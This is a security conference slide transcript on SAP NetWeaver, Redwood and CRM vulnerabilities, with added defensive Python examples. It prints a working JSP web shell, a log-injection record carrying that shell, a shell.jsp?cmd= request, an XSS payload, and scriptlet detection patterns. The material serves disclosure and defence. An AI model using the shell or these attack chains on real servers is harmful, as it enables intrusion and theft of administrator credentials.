THE PHANTOM SECURITY
Slide transcript · 2019-09-10
By Vahagn Vardanyan and Vladimir Egorov
Vahagn Vardanyan
Master Jedi. Senior security researcher at ERPScan.
Bug hunter, malware and vulnerability researcher for over 5 years.
System of a Down FAN!!!
Vladimir Egorov
Young padawan. Security researcher at ERPScan.
Business application security, reverse engineering, and encryption.
»><svg\onload=alert("HELLO")>
LET THE HATE FLOW THROUGH YOU
Introduction
SAP NetWeaver
Redwood
Revenge of the Logs
A New Hope
Introduction
• What is SAP?
• Vulnerability statistics
• The newest CVEs
• Structure reminder
SAP NetWeaver
• What is NetWeaver?
• How to deploy apps?
Redwood
• Where can I find it?
• How to get access?
• A vulnerability
• DEMO
Revenge of the Logs
• What is SAP CRM?
• How does it look?
• RCE via log injection
• DEMO
A New Hope
• Vulnerable systems in the WILD
• PATCH info
Episode I
SAP NetWeaver
A short time ago in a galaxy very, very close ...
COMPANY
SAP Notes by Year (chart)
CVE-2017-6950   Location: SAP GUI         Type: RCE
CVE-2017-7717   Location: SAP NetWeaver   Type: SQL injection to RCE
CVE-2017-9844   Location: SAP NetWeaver   Type: Java deserialization
CVE-2017-11459  Location: SAP TREX        Type: RCE
How to get admin privileges in SAP?
Episode I
SAP NetWeaver
http://host:port/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
CVE-2016-3973  Location: SAP NetWeaver AS Java WD_CHAT
Type: Information Disclosure vulnerability
The bug here I feel, young padawan.
URL: https://host:port/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS?javascript/old/utils.js
Path on filesystem: C:/usr/sap/<SID>/J00/j2ee/cluster/apps/redwood.com/scheduler-ear/servlet_jsp/scheduler/root/black/javascript/old/utils.js
https://host:port/scheduler/ui?
Windows win.ini
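How an anonymous directory traversal like this one comes about, as an added example (not the Redwood scheduler's code and not ERPScan's): a static-file resolver that trusts the value after `UIUtilJavaScriptJS?` and joins it onto the web root, next to a hardened resolver that refuses anything resolving outside the root. `WEB_ROOT`, the request paths and the win.ini targets are constructed; the hash-like path segment of the real URL is not modelled.

```python
"""Resolving a requested static file against a web root: the trusting join that
produces an anonymous directory traversal, beside a hardened resolver.  Added
example, not the Redwood scheduler's code; WEB_ROOT and the request paths are
constructed to mirror the layout shown on the slide."""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed web root (the directory the slide's utils.js URL is served from).
WEB_ROOT = ("/usr/sap/SID/J00/j2ee/cluster/apps/redwood.com/scheduler-ear"
            "/servlet_jsp/scheduler/root/black")


def decode_path(raw: str) -> str:
    """URL-decode until the value stops changing (so %252e%252e is not missed)
    and fold backslashes, which Windows accepts as separators, into '/'."""
    prev, cur = None, raw
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def resolve_unsafe(root: str, requested: str) -> str:
    """Vulnerable pattern: join the decoded request onto the root and normalise.
    '..' segments survive, so enough of them walk out of the root; normpath then
    also swallows any surplus '..' at '/', which is why traversal payloads often
    just use far more '../' than needed."""
    return posixpath.normpath(posixpath.join(root, decode_path(requested)))


def resolve_safe(root: str, requested: str) -> Optional[str]:
    """Hardened resolver: refuse absolute paths, normalise, then serve only if the
    result is the root itself or strictly below it.  Returns None when denied.
    (On a real filesystem, also resolve symlinks with os.path.realpath first.)"""
    rel = decode_path(requested)
    if rel.startswith("/"):
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, rel))
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed requests: the legitimate file, then traversal attempts aimed at win.ini.
    for req in ("javascript/old/utils.js",
                "../" * 20 + "Windows/win.ini",
                "%252e%252e%252f" * 20 + "Windows/win.ini",
                "..\\..\\Windows\\win.ini"):
        print(f"{req[:40]:<40} unsafe={resolve_unsafe(WEB_ROOT, req)}  safe={resolve_safe(WEB_ROOT, req)}")
```

Run it to see every traversal variant land on /Windows/win.ini through the unsafe resolver and get refused by the safe one; the decode-until-stable loop is what keeps double-encoded `%252e` payloads from slipping past the containment check.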
JUST REPORT IT
DEMO TIME
SecStore in SAP is like the Death Star's thermal exhaust port:
A little weakness in the center of a fortified system
SecStore.properties + SecStore.key
→ Administrator credentials
→ Database credentials
SecStore Decryptor
SecStore.key + hardcoded key → the real key
SecStore.properties → AdminPassword, encrypted with 3DES (CBC)
Algorithm: PBEWithSHAAnd3KeyTripleDESCBC
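What PBEWithSHAAnd3KeyTripleDESCBC computes before 3DES-CBC runs, as an added example rather than SAP's code or the ERPScan decryptor shown in the demo: the PKCS #12 key-derivation function (RFC 7292, Appendix B) with SHA-1, which that algorithm name denotes. The password, salt and iteration count are constructed; the slide does not show how SecStore.properties stores them, and the hard-coded key that protects SecStore.key is not reproduced here.

```python
"""The key derivation inside PBEWithSHAAnd3KeyTripleDESCBC, the algorithm named on
the slide: the PKCS #12 KDF of RFC 7292 Appendix B with SHA-1, producing a 24-byte
3DES key (ID=1) and an 8-byte CBC IV (ID=2) from a password and salt.  Added
example, not SAP's code or ERPScan's decryptor; password, salt and iteration count
below are constructed."""
import hashlib
import math
from typing import Tuple

V = 64   # SHA-1 input block size in bytes ("v" in RFC 7292 B.2)
U = 20   # SHA-1 output size in bytes ("u")


def bmp_string(password: str) -> bytes:
    """PKCS #12 passwords are UTF-16BE with a trailing 2-byte NUL (an empty
    password stays empty).  Encoding as UTF-8 here is the classic way to derive the wrong key."""
    return (password.encode("utf-16-be") + b"\x00\x00") if password else b""


def fill_to(data: bytes, length: int) -> bytes:
    """Repeat data to exactly length bytes (the S and P construction)."""
    return (data * (length // len(data) + 1))[:length] if data else b""


def pkcs12_kdf(password: bytes, salt: bytes, iterations: int, id_byte: int, n: int) -> bytes:
    """Derive n bytes.  id_byte: 1 = cipher key, 2 = IV, 3 = MAC key."""
    d = bytes([id_byte]) * V                                   # D: v/8 copies of the ID byte
    s = fill_to(salt, V * math.ceil(len(salt) / V))
    p = fill_to(password, V * math.ceil(len(password) / V))
    i_block = bytearray(s + p)                                 # I = S || P
    out = b""
    for _ in range(math.ceil(n / U)):
        a = hashlib.sha1(d + i_block).digest()
        for _ in range(iterations - 1):                        # A_i = H^r(D || I)
            a = hashlib.sha1(a).digest()
        out += a
        b_plus_one = int.from_bytes(fill_to(a, V), "big") + 1  # B = A repeated to v/8 bytes
        for j in range(0, len(i_block), V):                    # I_j = I_j + B + 1 (mod 2^v)
            word = (int.from_bytes(i_block[j:j + V], "big") + b_plus_one) % (1 << (8 * V))
            i_block[j:j + V] = word.to_bytes(V, "big")
    return out[:n]


def derive_3des_cbc(password: str, salt: bytes, iterations: int) -> Tuple[bytes, bytes]:
    """(key, iv) that PBEWithSHAAnd3KeyTripleDESCBC hands to 3DES-CBC.  The
    decryption itself needs a 3DES implementation, e.g. pycryptodome's
    DES3.new(key, DES3.MODE_CBC, iv), followed by removing PKCS#7 padding."""
    pw = bmp_string(password)
    return pkcs12_kdf(pw, salt, iterations, 1, 24), pkcs12_kdf(pw, salt, iterations, 2, 8)


if __name__ == "__main__":
    # Constructed inputs; a real decryptor reads salt and iteration count from the
    # PBE parameters stored alongside each encrypted entry.
    key, iv = derive_3des_cbc("changeme", bytes.fromhex("0a58cf64530d823f"), 2048)
    print("3DES key:", key.hex())
    print("CBC IV  :", iv.hex())
```

Two details decide whether a re-implemented decryptor produces plaintext or garbage: the password has to be encoded as UTF-16BE with a trailing NUL, and the ID byte (1 for key, 2 for IV) is all that separates the two derivations from the same password and salt.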
DEMO TIME
https://github.com/erpscanteam
What do we have now?
Findings
I. Anonymous directory traversal in the scheduler by Redwood
II. Decryption tool to get the administrator password
III. ???
Customer Relationship Management
"What is that???"
Customer Relationship Management
• Emails, telephones, chats, marketing materials, social media...
• Analysing target audiences
• A kind of collaboration
Log configuration...
SAP SYSTEM
SAP AS JAVA: Applications, Database, Logs
Before... / After... (diagram: where the Logs sit inside the SAP AS Java system before and after the log configuration change)
DEMO TIME
| | Before | After |
|---|---|---|
| Log file extension | `*.log`, `*.xml` or `*.trc` | `*.jsp` |
| Access via browser | DENIED | GRANTED |
| Path on file system | `C:\usr\sap\DM0\J00\j2ee\cluster\server0\log\` | `C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp` |
| URL | None | `https://host:port/shell.jsp` |
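The two conditions the table contrasts (where the log file lands and what extension it gets) can be checked from the defender's side before a log destination is trusted. The following Python is an added example, not code from the talk: the directory roots and the allowed extensions are the ones shown on the slide, and collapsing `..` segments is an assumption about how a configured destination might be written.

```python
from pathlib import PureWindowsPath

# Roots taken from the slide's two states; treated here as the expected log
# directory and the deployed-applications tree the J2EE engine serves from.
LOG_ROOT = PureWindowsPath(r"C:\usr\sap\DM0\J00\j2ee\cluster\server0\log")
APPS_ROOT = PureWindowsPath(r"C:\usr\sap\DM0\J00\j2ee\cluster\apps")
ALLOWED_EXTENSIONS = {".log", ".xml", ".trc"}  # the slide's 'Before' extensions


def normalize(path):
    """Collapse '.' and '..' segments, which PureWindowsPath keeps verbatim,
    so a destination written with traversal is judged by where it lands."""
    parts = []
    for seg in path.parts:
        if seg == "..":
            if len(parts) > 1:  # never pop the drive anchor
                parts.pop()
        elif seg != ".":
            parts.append(seg)
    return PureWindowsPath(*parts)


def is_inside(path, root):
    try:
        path.relative_to(root)
        return True
    except ValueError:
        return False


def check_log_destination(candidate):
    """Return the findings for a configured log file destination (an empty
    list means it stays in LOG_ROOT with a non-executable log extension)."""
    p = normalize(PureWindowsPath(candidate))
    findings = []
    if not is_inside(p, LOG_ROOT):
        findings.append("outside the log directory")
    if is_inside(p, APPS_ROOT):
        findings.append("inside the deployed applications tree (browser-reachable)")
    if p.suffix.lower() not in ALLOWED_EXTENSIONS:
        findings.append(f"unexpected extension {p.suffix or '(none)'}")
    return findings


if __name__ == "__main__":
    for dest in (r"C:\usr\sap\DM0\J00\j2ee\cluster\server0\log\defaultTrace.trc",
                 r"C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp"):
        print(dest, "->", check_log_destination(dest) or ["ok"])
```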
![Page 95: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/95.jpg)
```jsp
<%@ page import="java.util.*,java.io.*"%>
<% if (request.getParameter("cmd") != null) {
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in); String disr = dis.readLine();
    out.println("<PRE>");
    while (disr != null) { out.println(disr); disr = dis.readLine(); }
    out.println("</PRE>");
} %>
```
![Page 96: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/96.jpg)
![Page 97: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/97.jpg)
![Page 98: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/98.jpg)
```text
...
#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction##CRM-ISA-BBS#sap.com/crm~b2b#C000AC100A410073000004A90000110C#2213550000000004#sap.com/crm~b2b#com.sap.isa.user.action.LoginBaseAction#Guest#0##74C4C72B0F7111E8B17500000021C6AE#c1229d500d1811e8a25b00000021c6ae#c1229d500d1811e8a25b00000021c6ae#0#Thread[HTTP Worker [@2035997437],5,Dedicated_Application_Thread]#Plain##request.parameter.["]<%@ page import="java.util.*,java.io.*"%><% if request.getParameter("cmd") != null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println("</PRE>");} %>["]="" #
#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction#
...
```
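The trace record above shows the root cause: the raw request parameter is written into the log verbatim, so a JSP scriptlet survives into a file the engine can later serve. As an added example (not from the talk), the Python below parses the hash-delimited SAP AS Java trace format shown on the slide and flags records whose logged request parameter carries scriptlet or process-spawning markers; the sample records are constructed (the second mirrors the slide's record in shortened form, with made-up IDs).

```python
import re

# Constructed sample in the '#'-delimited SAP AS Java trace format shown on the
# slide: a benign login record, then one whose logged request parameter carries
# a JSP scriptlet (the slide's record, shortened; IDs are constructed).
SAMPLE_LOG = """\
#2.0#2018 02 11 13:20:59:101#0-800#Debug#com.sap.isa.user.action.LoginBaseAction##CRM-ISA-BBS#sap.com/crm~b2b#C000000000000000000000000000000B#2213550000000003#sap.com/crm~b2b#com.sap.isa.user.action.LoginBaseAction#Guest#0##00000000000000000000000000000001#00000000000000000000000000000002#00000000000000000000000000000002#0#Thread[HTTP Worker [@1],5,Dedicated_Application_Thread]#Plain##request.parameter.["]lang["]="en" #
#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction##CRM-ISA-BBS#sap.com/crm~b2b#C000000000000000000000000000000C#2213550000000004#sap.com/crm~b2b#com.sap.isa.user.action.LoginBaseAction#Guest#0##00000000000000000000000000000003#00000000000000000000000000000004#00000000000000000000000000000004#0#Thread[HTTP Worker [@2],5,Dedicated_Application_Thread]#Plain##request.parameter.["]<%@ page import="java.util.*,java.io.*"%><% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>["]="" #
"""

# Markers that have no business inside a logged HTTP parameter value: JSP
# scriptlet delimiters and the Java calls used to spawn a process.
SCRIPTLET_MARKERS = re.compile(r"<%|%>|Runtime\.getRuntime\(\)\.exec|new\s+ProcessBuilder")


def parse_record(line):
    """Split one trace record into a few header fields and the message text.

    Header fields are '#'-delimited; the message follows the 'Plain' format
    marker and may itself contain '#', so the line is split only up to it.
    """
    head, marker, message = line.partition("#Plain#")
    if not marker:
        return None
    fields = head.split("#")  # fields[0] == '' because the record starts with '#'
    return {
        "timestamp": fields[2],
        "severity": fields[4],
        "location": fields[5],
        "message": message.strip("# "),
    }


def find_injected_scriptlets(log_text):
    """Return (timestamp, location, marker) for every record whose logged
    request parameter contains scriptlet or process-spawning markers."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or "request.parameter" not in rec["message"]:
            continue
        match = SCRIPTLET_MARKERS.search(rec["message"])
        if match:
            hits.append((rec["timestamp"], rec["location"], match.group(0)))
    return hits


if __name__ == "__main__":
    for ts, loc, marker in find_injected_scriptlets(SAMPLE_LOG):
        print(f"{ts} {loc}: suspicious marker {marker!r} in logged parameter")
```

The same scan applied to logs that already sit under a web-served directory (as in the slide's After state) is the quickest way to confirm whether a planted scriptlet has landed.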
![Page 99: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/99.jpg)
https://host:port/shell.jsp?cmd=ipconfig
![Page 100: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/100.jpg)
DEMO TIME
![Page 101: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/101.jpg)
![Page 102: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/102.jpg)
![Page 103: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/103.jpg)
- 78 United States
- 42 India
- 38 Chile
- 28 Germany
- 25 Brazil
- 23 Australia
- 19 France
- 13 Singapore
- 12 Turkey
- 12 Taiwan
- 11 Spain
- 11 Republic of Korea
- 11 Colombia
- 10 Italy
- 9 Russian Federation
***
Almost 500 public SAP servers are Vulnerable
![Page 104: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/104.jpg)
PATCH
• Update CRM (2547431)
• Upgrade to Redwood 9
• Install SAP note 2486657 (exploited in the wild)
![Page 105: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/105.jpg)
THANK YOU
USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301. Phone 650.798.5255
EU: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam. Phone +31 20 8932892
EU: Štětkova 1638/18, Prague 4 - Nusle, 140 00, Czech Republic
Read our blog: erpscan.com/category/press-center/blog/
Join our webinars: erpscan.com/category/press-center/events/
Subscribe to our newsletters: eepurl.com/bef7h1